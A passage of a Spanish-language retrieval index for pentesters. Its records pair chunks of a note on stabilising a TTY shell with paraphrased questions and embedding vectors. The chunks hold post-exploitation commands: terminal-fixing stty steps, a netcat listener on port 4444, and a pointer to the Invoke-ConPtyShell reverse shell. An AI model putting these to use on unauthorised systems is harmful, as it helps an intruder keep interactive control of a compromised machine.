shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "indexar": "que programa sirve para estabilizar una shell rota y recuperar las teclas de navegaciΓ³n?", "v": [0.10096, -0.14174, -0.30288, -0.09666, 0.11422, -0.14182, -0.01208, -0.0533, 0.13081, 0.00184, -0.17609, -0.01786, 0.11366, -0.04866, 0.12156, 0.07442, -0.06095, -0.11693, 0.0119, 0.05362, -0.05634, -0.16818, -0.00514, -0.03346, -0.01547, 0.05892, -0.00113, -0.02622, -0.11545, -0.00403, -0.0449, -0.04279, 0.01168, -0.14422, -0.01752, 0.02029, 0.05483, -0.09726, -0.05341, 0.03615, -0.04962, -0.00769, -0.01608, 0.03139, 0.1518, 0.04891, 0.00962, -0.03544, -0.05771, -0.01773, -0.00733, -0.07249, 0.00296, -0.01679, 0.05625, -0.02648, 0.11007, -0.09193, -0.02576, -0.08412, -0.06522, 0.08094, 0.05373, 0.03375, 0.05998, -0.04123, 0.03089, -0.11766, -0.09287, 0.0448, 0.00538, 0.03573, 0.03035, 0.00749, -0.01004, -0.01779, 0.0141, 0.09772, 0.15614, 0.03052, -0.01627, -0.06515, -0.11815, 0.07244, -0.04608, -0.04663, 0.04276, -0.03491, -0.07543, -0.0022, 0.03684, -0.0372, -0.02035, 0.07927, 0.01567, -0.03942, -0.02302, 0.04881, -0.02938, 0.08576, 0.10825, -0.04229, -0.02081, 0.04962, 0.04184, 0.09533, 0.09999, -0.01655, -0.02548, 0.08615, 0.03077, 0.0375, 0.01321, -0.03685, -0.06643, 0.01118, -0.05151, -0.05231, 0.00945, -0.03244, 0.02733, -0.0227, -0.07283, 0.02944, -0.05636, 0.10214, -0.00692, 0.06753, -0.01875, -0.02021, 0.06421, 0.04011, -0.04142, -0.01535, -0.0732, -0.02642, 0.06915, -0.00275, -0.02136, -0.09535, 0.07901, 0.16412, -0.00295, 0.02945, 0.00778, 0.04828, 0.11662, -0.00244, -0.03896, 0.00388, 0.01876, 0.09586, 0.02844, 0.00653, -0.04779, -0.0246, -0.04089, 0.02318, -0.0569, 0.0071, -0.02323, 0.0039, -0.01299, -0.00729, 0.06659, -0.08301, -0.06938, 0.02554, 0.09269, 0.03366, -0.03733, 0.05363, -0.00473, -0.079, -0.05613, -0.01776, -0.0556, -0.02341, 0.05694, -0.04263, -0.03849, 0.07603, 0.04733, -0.0501, -0.07762, -0.05154, -0.00255, 0.04846, -0.02813, -0.0242, 0.066, -0.01604, -0.03928, -0.03162, -0.02992, 0.00753, -0.10501, -0.00261, 0.07879, -0.03454, -0.03071, 0.00895, -0.00652, -0.05434, 0.09705, 0.04734, -0.0795, -0.00038, 0.09231, 0.02812, 0.00099, 0.02603, 0.0291, 0.07613, -0.03906, -0.02493, 0.05448, -0.00924, -0.00455, 0.07701, 0.01334, 0.01584, 0.05351, 0.05555, 0.00724, -0.0916, 0.05131, 0.0072, 0.02525, 0.02594, 0.01017, -0.01175, -0.05184, -0.03097, 0.03013, 0.00497, 0.05564, -0.06066, -0.00263, -0.03328, -0.01959, 0.08995, -0.0399, -0.10019, -0.03241, -0.08618, -0.04776, 0.03189, 0.0258, -0.00117, -0.0513, 0.06013, 0.05619, -0.09326, 0.05344, -0.00172]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "indexar": "cual herramienta permite corregir un terminal que pierde el control y no responde a sudo?", "v": [0.00772, 0.0864, -0.19622, -0.17808, 0.12102, -0.10566, -0.09422, -0.05276, -0.02813, 0.02685, -0.15771, -0.05697, 0.03078, -0.09054, 0.01348, -0.03696, -0.05838, -0.08408, 0.11456, -0.01304, 0.0283, -0.01428, 0.07191, -0.11704, -0.00084, 0.08317, 0.10299, -0.00919, -0.13135, -0.0923, -0.02382, -0.09959, 0.15334, -0.04881, -0.13965, 0.01455, -0.00764, 0.08071, 0.03247, 0.22949, 0.0226, -0.01693, -0.11, 0.0711, 0.06952, -0.07297, 0.0155, 0.01085, 0.07044, 0.08068, -0.02484, -0.08928, -0.06808, -0.01127, 0.03585, -0.06072, 0.1897, -0.11942, 0.11428, -0.13659, -0.16399, -0.0109, 0.08662, 0.04294, -0.02297, 0.00013, -0.0102, -0.05569, -0.15234, 0.14859, -0.01373, 0.03515, -0.01323, 0.07524, -0.01279, -0.0369, -0.08508, 0.10031, 0.10225, -0.03384, 0.04036, -0.09012, -0.11272, -0.00319, -0.05266, -0.10407, -0.05093, -0.04964, -0.09154, -0.03311, -0.01558, -0.01898, 0.04871, -0.00642, -0.05529, -0.06217, 0.00607, 0.04484, -0.02857, 0.0139, 0.16318, 0.02088, -0.12885, 0.10949, 0.02842, 0.02311, 0.03542, -0.0311, -0.02868, -0.01219, 0.01932, 0.00484, 0.08002, -0.00126, -0.02671, 0.01882, -0.00404, 0.01122, -0.03288, -0.08932, -0.00491, -0.01958, 0.0077, -0.06653, 0.04969, -0.03659, 0.03541, 0.11639, 0.05226, -0.03412, -0.03839, -0.09267, 0.0272, -0.02666, -0.06141, -0.01241, 0.0179, -0.09034, -0.00772, 0.00755, -0.04655, 0.03353, -0.03, -0.0702, 0.06538, -0.03263, -0.01032, -0.03816, -0.08474, -0.02733, -0.01363, -0.01132, 0.01613, 0.01712, -0.06691, 0.03433, -0.01838, 0.00858, -0.10667, 0.0503, -0.04097, -0.10216, -0.04494, 0.02152, 0.015, -0.10753, -0.04838, 0.03109, 0.06193, 0.0083, -0.00196, 0.03356, 0.01267, 0.0163, -0.01826, -0.05247, -0.01117, -0.03385, 0.05045, -0.06874, -0.01143, 0.00431, -0.01753, 0.01023, 0.00777, -0.0344, -0.00353, -0.00709, 0.01365, 0.06128, 0.03418, 0.0209, -0.00281, -0.05558, 0.02351, 0.00341, -0.00035, -0.05457, 0.00701, -0.01619, -0.0635, 0.05404, 0.01922, -0.0412, 0.02897, 0.02392, -0.05019, 0.00101, -0.00111, 0.00979, 0.01133, 0.05402, 0.05268, 0.02835, -0.03629, -0.04348, 0.00067, 0.03646, -0.01292, 0.01548, 0.05733, -0.06156, 0.02514, 0.00325, -0.02785, -0.00288, 0.03445, 0.04384, 0.00261, 0.02784, 0.00514, -0.02272, -0.0226, -0.03106, 0.04177, -0.04985, 0.10183, -0.01329, -0.01202, -0.05521, 0.01823, 0.0853, 0.01161, -0.0593, -0.06296, 0.01503, -0.01477, -0.01141, 0.00225, -0.03566, 1e-05, 0.02721, 0.04201, -0.04331, -0.00153, -0.03296]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "indexar": "con que puedo reparar un shell TTY sin Ctrl+C ni flechas?", "v": [0.07976, -0.0756, -0.20485, 0.06742, -0.01005, -0.12144, -0.00229, 0.12039, 0.11199, 0.02053, -0.12719, 0.08717, 0.01849, -0.07793, 0.10538, -0.03567, -0.1264, -0.10142, 0.11006, -0.04854, -0.03455, -0.12355, -0.11497, -0.11148, -0.05407, 0.02524, -0.03632, 0.0275, -0.07635, -0.02879, -0.00993, -0.06943, 0.20967, 0.03485, 0.03217, 0.09396, -0.03754, -0.07624, 0.01041, 0.05716, 0.01006, 0.06137, -0.10663, 0.09585, 0.04227, 0.00441, 0.08117, -0.01909, -0.00694, 0.1015, -0.01016, -0.1225, -0.13571, -0.12591, -0.0349, 0.03113, 0.22077, 0.02252, -0.02182, -0.15899, -0.04246, 0.06251, -0.05297, 0.12571, -0.07375, -0.03055, -0.01203, -0.10585, -0.09577, 0.11309, -0.06673, -0.01377, -0.02972, -0.03861, -0.07474, -0.03765, -0.09848, -0.08009, 0.09532, 0.02238, -0.03806, -0.05198, -0.04073, -0.06164, 0.00377, 0.01569, -0.02667, -0.03743, -0.07432, -0.06681, 0.01122, -0.02604, 0.06386, 0.07158, -0.01596, 0.01194, 0.10624, -0.03635, -0.00318, 0.06607, 0.09103, -0.07405, -0.06528, 0.13736, -0.03157, -0.01554, 0.01385, -0.02574, 0.0246, 0.06102, 0.16148, 0.011, -0.01699, -0.03, -0.08898, 0.01227, 0.01067, -0.03821, 0.02803, -0.0161, -0.02078, -0.13421, -0.03067, 0.08662, -0.03079, 0.08248, 0.00308, 0.10471, -0.11851, -0.02511, -0.02644, 0.03015, 0.07357, -0.10805, 0.04113, 0.07676, 0.03474, -0.03211, -0.01801, -0.00166, 0.02007, 0.13399, 0.05326, 0.02148, 0.03451, 0.05026, 0.03828, 0.00834, -0.07045, -0.05883, 0.12519, 0.01755, 0.08451, 0.04566, -0.01076, -0.00464, -0.0075, 0.06331, 0.07884, -0.01373, 0.01921, -0.05404, -0.02055, 0.00124, 0.00402, -0.04333, -0.03796, 0.02861, 0.03594, -0.00512, -0.01933, 0.08424, 0.00343, -0.05285, -0.03749, -0.03861, 0.0664, 0.02323, 0.06486, -0.01362, 0.05846, -0.02128, -0.02339, 0.0155, -0.01105, 0.02229, 0.02072, 0.00552, -0.02538, -0.02319, 0.0909, -0.0029, 0.04645, -0.04351, -0.02655, 0.06885, -0.02114, -0.06582, 0.00605, -0.05812, -0.02832, 0.01285, 0.05192, -0.03967, 0.06208, -0.03638, -0.00106, 0.03683, 0.02684, 0.01365, 0.03103, 0.00076, 0.01926, 0.0306, 0.01456, -0.00199, -0.04588, 0.05825, -0.06075, -0.00906, 0.05592, 0.02097, 0.09865, 0.03955, 0.05202, -0.01777, 0.00535, 0.03627, -0.01949, 0.03418, 0.00766, 0.04694, 0.01667, -0.0083, -0.03769, -0.00131, 0.01304, -0.03309, 0.00219, 0.05451, 0.00051, 0.01599, -0.02035, 0.01332, 0.00797, -0.01773, 0.01908, 0.02872, -0.01221, -0.03825, 0.02445, 0.01138, 0.02808, -0.03836, 0.02662, -0.01469]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "indexar": "con que puedo ver la resoluciΓ³n de la terminal en mi Kali?", "v": [-0.12484, 0.07951, -0.09315, 0.00021, -0.00747, -0.07457, 0.00247, 0.10908, 0.00967, 0.04159, -0.13355, -0.0983, 0.13373, -0.00457, 0.06082, 0.0783, -0.14572, -0.0997, 0.1624, -0.01394, 0.0462, -0.09366, -0.0101, 0.02848, 0.04494, 0.15128, 0.05786, -0.03436, -0.02727, -0.27845, -0.00439, -0.06986, 0.02894, -0.09885, 0.04438, 0.02947, -0.02525, 0.09154, 0.00799, 0.00388, 0.02046, -0.05932, 0.0521, 0.02936, 0.13576, -0.10749, 0.12661, 0.00716, 0.05374, -0.02843, 0.00165, 0.01988, -0.05524, 0.12971, 0.00779, -0.08842, 0.02373, 0.00199, 0.13231, -0.05682, -0.10242, -0.06834, 0.01855, 0.06884, 0.08995, -0.01506, -0.02246, 0.15134, -0.04796, 0.06355, -0.00559, 0.05227, 0.00202, 0.02325, -0.03289, 0.05295, -0.11804, 0.00266, 0.16263, 0.08977, 0.06433, 0.00379, -0.06853, -0.03544, -0.02515, -0.12235, -0.11769, -0.01849, 0.04255, 0.03516, 0.01566, -0.04442, -0.03092, 0.07862, -0.0152, -0.05942, -0.03307, 0.05315, -0.05473, 0.05445, 0.11966, 0.08442, 0.00325, 0.01031, 0.02935, -0.07153, 0.03934, -0.05949, 0.05859, -0.06005, 0.04552, -0.02671, 0.11793, -0.08719, -0.14684, -0.0125, 0.00886, 0.01592, -0.09001, 0.00462, 0.06299, -0.0918, 0.06603, -0.04752, 0.05796, -0.02648, -0.10545, 0.05045, 0.09828, 0.0434, -0.02366, -0.03873, 0.00605, -0.02686, -0.01835, -0.04314, 0.06222, -0.11063, 0.01903, 0.08565, 0.02957, -0.03042, 0.02466, -0.00419, 0.04323, 0.01706, -0.17266, 0.03095, -0.06289, -0.13035, 0.02166, -0.07096, 0.05165, -0.00047, -0.05893, 0.03443, 0.08681, 0.03567, -0.01419, 0.10088, -0.07377, -0.01374, -0.10796, 0.02569, 0.04159, 0.0101, -0.11295, -0.03113, 0.01649, -0.01161, -0.03643, -0.00501, -0.02707, 0.01498, 0.03198, 0.0206, -0.03037, 0.02224, 0.01169, 0.01499, -0.01857, 0.03103, -0.02552, 0.02916, 0.00066, -0.03404, 0.00503, 0.00535, 0.06187, 0.03239, 0.06971, 0.03674, 0.01224, 0.03425, 0.02427, 0.01733, 0.05029, 0.01519, -0.04465, -0.06723, 0.01885, 0.0518, 0.05179, -0.03139, 0.03042, 0.00657, -0.10113, 0.05148, 0.00768, 0.04882, -0.03854, 0.03736, 0.08507, -0.00173, -0.02511, -0.02029, 0.02235, 0.00381, 0.00819, 0.07492, -0.00813, -0.00581, 0.01088, 0.03256, -0.03805, 0.0099, 0.02759, -0.00667, -0.01176, 0.00785, -0.01842, 0.05284, -0.00115, -0.04675, 0.01717, 0.03983, 0.00159, -0.04525, -0.01466, -0.09058, 0.03714, 0.05758, 0.01435, -0.02759, -0.00468, -0.01011, -0.02388, 0.00584, -0.02731, -0.00557, -0.04845, 0.0214, 0.05467, -0.0327, -0.04066, 0.01929]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "indexar": "que comando me dice cuantos filas y columnas tiene mi terminal?", "v": [0.11822, 0.04449, -0.09097, -0.00086, -0.02846, -0.11991, 0.0045, 0.0476, -0.11466, 0.07757, -0.08177, 0.03262, 0.08972, -0.04592, 0.12943, 0.00342, 0.0157, -0.04788, 0.12239, -0.13312, -0.04324, -0.12286, 0.00895, -0.01627, 0.07183, -0.0059, 0.06929, -0.0586, -0.1507, -0.1712, 0.1496, -0.06593, 0.13178, -0.10112, 0.0537, 0.01112, -0.14308, 0.04361, -0.06729, 0.13951, -0.15854, 0.02883, -0.18756, 0.0048, 0.00011, -0.12923, -0.01648, 0.0066, 0.06545, -0.05336, -0.00891, -0.05161, 0.05108, 0.11753, 0.03845, -0.02667, 0.0961, 0.01695, 0.13157, 0.04281, -0.06107, -0.07159, 0.05371, 0.1232, -0.01453, 0.045, -0.01782, -0.11076, -0.01479, 0.05292, -0.0363, 0.11557, -0.1381, 0.09858, 0.01272, -0.02975, 0.01674, -0.06831, 0.13043, 0.06005, 0.00977, -0.00177, -0.07356, 0.10148, 0.01891, -0.07453, -0.12599, 0.03366, -0.03802, 0.08247, 0.03353, -0.06843, -0.02251, 0.07581, -0.01185, 0.03514, -0.03699, 0.11746, 0.01587, 0.027, 0.04129, 0.07684, -0.07272, 0.10158, 0.02964, 0.05894, 0.03393, -0.12108, 0.10527, -0.00845, 0.0706, -0.04723, 0.12138, -0.00678, -0.08283, -0.04342, -0.00768, 0.00364, -0.05493, -0.0727, -0.06779, -0.0037, 0.03501, 0.04733, 0.08343, -0.03112, -0.1053, 0.0008, 0.13598, 0.00414, -0.02507, -0.03258, 0.08702, -0.10274, -0.06946, 0.0652, 0.06453, -0.07917, -0.07225, -0.01044, -0.06455, 0.04666, -0.04741, -0.00221, 0.03631, 0.03349, -0.00686, -0.05861, -0.04213, -0.07766, -0.01397, 0.00538, -0.06346, 0.03962, -0.01094, 0.03146, 0.0421, 0.00536, -0.04967, 0.0504, -0.01976, -0.08706, -0.03185, 0.0199, 0.01941, -0.00013, -0.0747, 0.02157, -0.00168, -0.06198, 0.0004, -0.00606, -0.02803, -0.00667, 0.0198, -0.02464, -0.008, 0.02942, -0.01163, 0.01548, -0.00407, 0.02877, -0.03511, -0.01939, -0.0167, -0.07577, -0.02733, 0.02219, 0.06159, 0.03717, 0.01256, 0.06347, -0.01128, -0.02683, -0.02121, 0.02595, 0.04684, -0.03119, 0.01299, -0.03055, -0.0279, 0.11316, 0.0393, -0.05543, 0.02603, 0.02158, -0.07119, 0.0344, 0.02999, -0.01288, 0.02765, 0.03619, 0.02819, -0.02225, -0.02626, -0.08461, 0.01122, 0.00679, 0.0081, 0.01197, 0.03773, 0.01636, 0.04307, 0.03616, 0.00891, 0.01753, -0.03578, -0.00088, 0.08337, 0.05656, -0.02797, -0.00918, 0.02199, -0.02834, -0.01653, -0.0338, -0.00276, -0.00287, 0.02335, -0.03542, 0.07234, 0.06973, -0.0035, -0.03159, -0.02953, -0.05519, -0.05516, 0.0058, -0.03683, 0.01767, -0.07002, -0.00556, -0.01141, -0.03341, -0.01589, -0.03795]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "indexar": "como sΓ© cual es el tamaΓ±o actual de mi consola en Kali?", "v": [-0.16393, 0.04389, -0.05959, 0.20518, -0.13907, -0.26472, -0.01948, -0.10503, -0.08208, -0.09216, -0.16654, -0.03201, -0.02384, -0.07446, 0.05985, -0.00242, 0.11844, -0.13301, 0.05688, 0.05078, 0.03438, -0.10313, 0.02377, -0.05763, 0.0621, 0.05186, 0.15888, 0.06985, -0.06908, -0.074, -0.00951, 0.02334, 0.01287, -0.14844, 0.04711, -0.00642, -0.03048, 0.04227, -0.059, -0.09339, 0.07429, 0.01998, 0.05363, -0.01507, 0.06486, -0.05753, 0.05297, 0.05416, 0.01094, 0.01724, -0.05061, 0.08083, 0.01165, 0.05442, 0.06117, -0.14116, 0.06333, -0.04951, 0.19068, 0.00906, -0.09315, -0.04235, 0.01971, -0.00075, 0.02386, -0.01777, -0.12664, -0.0056, -0.14615, -0.05696, -0.09475, -0.03154, -0.0745, -0.06042, -0.05069, 0.01589, -0.08771, -0.07257, 0.02587, -0.04676, 0.07714, -0.09466, -0.07449, 0.01886, 0.00262, -0.02342, 0.03404, -0.13157, -0.01646, -0.00077, 0.03316, -0.09668, -0.06377, 0.10589, 0.04305, -0.07966, 0.07511, 0.02893, -0.01515, 0.04418, 0.07002, 0.03231, -0.09858, 0.02864, -0.01252, 0.0144, 0.02641, -0.07017, 0.06307, -0.02584, 0.02709, 0.08749, 0.01608, 0.02757, -0.02291, -0.00228, -0.07789, -0.03422, 0.02863, -0.08426, -0.04626, -0.02317, -0.00755, -0.08637, -0.04012, -0.01014, -0.07202, -0.02996, 0.03859, 0.02362, -0.00264, -0.07349, 0.00301, -0.02952, 0.04941, 0.00181, -0.04929, -0.02953, -0.01019, 0.00269, 0.0366, 0.09996, 0.00896, -0.13787, 0.07641, 0.04911, 0.07035, 0.06449, -0.06925, -0.01706, 0.00837, 0.05586, 0.11854, 0.08196, 0.08092, 0.06183, 0.0051, 0.01987, -0.0545, 0.07507, -0.0035, 0.0031, 0.01612, 0.02389, 0.0155, -0.02148, -0.07238, 0.01309, 0.04685, -0.03405, -0.03112, 0.00263, -0.00165, -0.00728, 0.00758, -0.00456, -0.04859, -0.0029, 0.05056, -0.08213, -0.01659, 0.08882, -0.04813, -0.00898, -0.08409, -0.02137, 0.00937, -0.01461, -0.01153, -0.01847, 0.04719, 0.04009, 0.01717, -0.02902, 0.02265, 0.00359, -0.00313, -0.03679, 0.00433, -0.0491, 0.04321, 0.03073, -0.07411, -0.01861, 0.01314, 0.01012, -0.04797, -0.01023, -0.07241, 0.03468, 0.03042, 0.07357, 0.04166, 0.02762, 0.00466, -0.03627, 0.10032, 0.00124, 0.02077, 0.04585, -0.04739, 0.00803, 0.07207, -0.07804, -0.11371, 0.01258, 0.01891, -0.01562, 0.01102, -0.03714, -0.01508, 0.08049, -0.00762, -0.02984, 0.03774, 0.03175, 0.09411, -0.04254, -0.03361, -0.08198, 0.03396, -0.0146, -0.03228, -0.05483, 0.02851, -0.0679, -0.05182, -0.0007, -0.03379, -0.06951, -0.01616, 0.02584, 0.04444, -0.0609, -0.01977, -0.01301]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "indexar": "cual es un programa que me permita tener acceso a la consola de una mΓ‘quina remota", "v": [0.00641, 0.00624, -0.17721, -0.1279, -0.06141, -0.10297, -0.00967, -0.06687, -0.1354, -0.07143, -0.15846, 0.00704, 0.12802, -0.04444, 0.08368, -0.00891, 0.1039, 0.00407, 0.09934, 0.0755, 0.07381, -0.04318, 0.03712, -0.053, 0.01204, 0.01231, 0.21227, -0.00228, -0.0694, -0.11352, 0.0384, -0.09079, 0.12539, -0.09618, 0.05178, -0.0531, -0.00628, 0.0468, 0.0979, -0.05623, 0.09025, 0.00539, -0.09832, -0.03022, 0.19081, -0.08634, 0.13147, 0.04172, 0.01308, -0.03082, -0.08127, -0.01035, 0.05518, 0.01353, 0.08286, -0.09822, 0.10786, -0.04195, 0.06752, 0.04647, -0.05062, -0.00946, 0.02094, -0.01893, -0.05356, 0.00833, -0.04055, -0.06992, -0.11453, 0.0386, -0.10289, -0.07019, 0.03475, -0.08968, -0.01347, 0.00091, -0.15621, -0.04916, 0.09083, -0.09426, -0.01197, -0.10488, -0.05789, 0.0089, -0.04228, -0.05966, 0.10432, -0.01263, -0.0051, -0.10926, 0.01437, -0.02457, -0.0271, 0.07595, 0.13071, -0.0571, 0.11324, 0.03692, -0.00469, -0.00481, 0.0611, 0.04204, -0.09193, 0.12914, -0.09852, 0.06276, 0.09105, -0.04444, -0.04656, 0.00417, 0.02515, 0.07008, -0.07547, -0.00856, -0.09636, -0.00719, -0.11265, -0.02815, 0.05879, -0.0448, -0.05367, 0.03119, 0.00827, -0.06353, 0.07381, -0.00719, -0.04749, 0.08706, -0.05173, 0.03524, 0.02248, -0.03211, 0.01684, -0.0013, -0.01042, -0.02539, -0.04385, -0.10358, -0.00944, -0.05989, 0.05278, 0.10696, -0.00895, -0.04739, 0.07874, -0.00395, 0.04811, -0.06672, -0.02408, 0.00322, 0.00136, 0.00926, 0.05196, 0.04971, -0.04299, 0.07646, -0.01703, 0.00714, -0.08644, 0.04836, -0.0804, 0.00136, -0.06953, -0.063, -0.00704, -0.01343, -0.04065, 0.03128, 0.03312, -0.00266, -0.11375, 0.00093, 0.02886, 0.01788, -0.00862, -0.00449, -0.01161, -0.04486, 0.02174, -0.06328, -0.09568, 0.06629, 0.01432, -0.08716, -0.05868, -0.01007, -0.06664, -0.02616, 0.02487, -0.0363, 0.06258, 0.02295, -0.06478, -0.0171, 0.06261, -0.00927, -0.08021, 0.00109, 0.06232, -0.01681, -0.0402, -0.00166, -0.04825, -0.03457, 0.04957, 0.05044, -0.00506, -0.05469, -0.01991, 0.04279, 0.05745, 0.01046, 0.03597, 0.01986, -0.02466, -0.05685, 0.0254, -0.00292, 0.01627, 0.01906, 0.04046, -0.04926, 0.07001, 0.0097, -0.02915, -0.01143, 0.0639, 0.08671, 0.0363, -0.08755, 0.00671, -0.03406, -0.00577, -0.05034, 0.02042, 0.00691, 0.0178, -0.10011, -0.0269, -0.04871, 0.00853, 0.07022, 0.01901, -0.07801, -0.01753, -0.04269, -0.06277, -0.00602, -0.04087, -0.02882, -0.04242, 0.00648, 0.02333, -0.02541, 0.02539, 0.06048]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "indexar": "con quΓ© puedo escuchar la salida de comandos ejecutados en otra PC", "v": [0.10616, 0.21743, -0.07536, -0.08912, -0.01732, -0.09363, 0.05688, 0.03907, -0.00263, -0.07533, -0.08618, 0.08144, -0.00959, 0.00459, -0.01215, -0.0186, 0.09571, 0.166, 0.02721, -0.08064, 0.03122, -0.07994, 0.02372, 0.01655, 0.04742, 0.14116, 0.08166, 0.07784, -0.0966, -0.08873, -0.03819, 0.0607, 0.02123, -0.10198, 0.0405, 0.01464, -0.05037, 0.08255, 0.02568, 0.18208, -0.09037, 0.04748, -0.07294, -0.05727, 0.10364, -0.12962, 0.03056, 0.01849, 0.09578, -0.06841, 0.00486, -0.03768, -0.14287, -0.0643, -0.0012, -0.08206, 0.11597, -0.01002, 0.05098, -0.0717, -0.07816, 0.03576, 0.10086, 0.03216, 0.02882, 0.06088, -0.04525, -0.02963, 0.0638, 0.08516, -0.1322, 0.03682, -0.03898, 0.1027, 0.0923, -0.09147, -0.08363, -0.01077, 0.19383, 0.05512, 0.04715, -0.01018, -0.08746, -0.03712, -0.04878, 0.0393, -0.02282, -0.10962, -0.04418, -0.02306, 0.02408, -0.04122, -0.05265, 0.06449, 0.07296, 0.08291, 0.0434, 0.04016, 0.00678, 0.03718, 0.03291, 0.00475, -0.0545, 0.0838, 0.04027, 0.04054, 0.00627, -0.0372, 0.02968, 0.06142, -0.06698, -0.03921, -0.00891, -0.07392, -0.12076, -0.06866, -0.02079, -0.05993, 0.00276, 0.01925, -0.06871, 0.04763, -0.00573, 0.02603, -0.02628, -0.08247, -0.03515, 0.00869, 0.06192, -0.02769, 0.00163, -0.02097, 0.07874, -0.13516, -0.00873, 0.05251, 0.02303, -0.04486, -0.07675, -0.11655, 0.10697, 0.05516, 0.0023, 0.01962, 0.06451, -0.00668, -0.01088, -0.04087, -0.05028, -0.00261, 0.11026, 0.01779, -0.089, 0.01281, -0.04774, -0.06994, 0.01097, 0.01502, -0.01039, 0.06829, -0.11372, 0.02249, -0.07662, -0.01841, 0.06712, -0.03734, -0.00955, -0.03589, 0.01123, -0.02046, -0.02328, 0.03346, 0.04581, -0.05518, -0.03807, -0.10687, -0.07444, -0.03989, 0.08214, 0.02815, -0.08423, 0.08322, -0.12793, -0.04847, 0.0062, -0.0303, -0.02546, -0.06117, -0.04247, 0.00698, -0.02576, 0.0386, 0.00781, -0.04667, 0.05655, -0.05228, 0.03262, 0.00161, -0.10047, -0.00486, -0.11211, 0.03703, 0.01106, -0.10607, 0.06724, 0.04933, -0.02212, 0.08724, -0.03116, 0.05673, 0.03215, -0.01295, 0.05725, 0.03088, -0.05572, -0.02008, 0.05589, -0.007, -0.0073, 0.06031, 0.01052, 0.0179, 0.10876, -0.02794, 0.0316, 0.01444, -0.0075, -0.00389, 0.04332, 0.02078, -0.05746, 0.04354, 0.01637, 0.00429, -0.00168, 0.05853, -0.02746, 0.01868, -0.07097, -0.04349, 0.02326, 0.04949, -0.03399, -0.06425, -0.02731, -0.05117, -0.05626, 0.02863, -0.03269, -0.04625, -0.01444, 0.00217, 0.02444, -0.05466, -0.00481, -0.0219]} +{"tipo": "pregunta", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Windows\n- Usa **Invoke-ConPtyShell** (Reverse shell) para una shell interactiva real.\n- Listener con `stty raw -echo; (stty size; cat) | nc -lvnp 4444`.", "indexar": "que herramienta sirve para capturar comandos y su salida en tiempo real", "v": [0.11559, 0.09643, -0.15556, -0.1611, 0.04864, -0.18796, -0.00359, 0.03189, 0.07236, -0.01818, -0.09211, -0.11892, 0.07987, -0.03991, -0.01957, 0.10895, 0.10323, 0.03746, -0.04071, 0.00172, 0.06713, 0.00355, -0.01872, -0.08785, -0.00558, -0.01401, 0.12974, 0.02468, -0.22247, -0.02863, 0.00152, 0.0949, 0.05387, -0.0821, -0.07245, -0.15065, -0.06158, 0.04138, -0.09025, 0.10221, 0.01523, 0.07234, -0.11027, 0.03964, -0.0051, -0.05937, 0.03873, 0.05404, -0.00658, 0.00555, 0.00669, -0.09836, -0.10791, -0.03016, -0.1352, -0.11359, 0.20662, -0.07757, -0.01535, -0.08393, -0.12488, -0.07561, -0.03304, 0.01859, 0.03176, -0.04928, -0.0157, -0.07744, -0.05007, 0.02688, -0.08546, 0.03576, -0.0094, 0.07139, 0.00703, -0.09236, -0.04787, 0.00392, 0.11096, -0.06145, 0.02596, -0.04223, -0.09079, 0.03743, -0.08873, -0.06552, 0.06106, -0.11093, -0.01713, -0.11419, -0.04151, 0.0863, 0.03499, 0.01289, 0.0541, 0.02753, -0.0154, -0.03677, 0.03573, 0.0284, 0.08821, -0.06613, -0.1242, 0.07258, -0.01979, 0.03493, 0.02721, -0.04881, -0.07878, 0.07941, -0.05003, -0.03397, -0.00052, 0.00932, -0.03224, 0.02925, -0.00025, -0.12772, -0.02464, -0.0725, -0.04547, 0.0159, -0.04185, -0.06259, 0.02231, 0.02082, -0.08003, -0.0455, 0.07976, 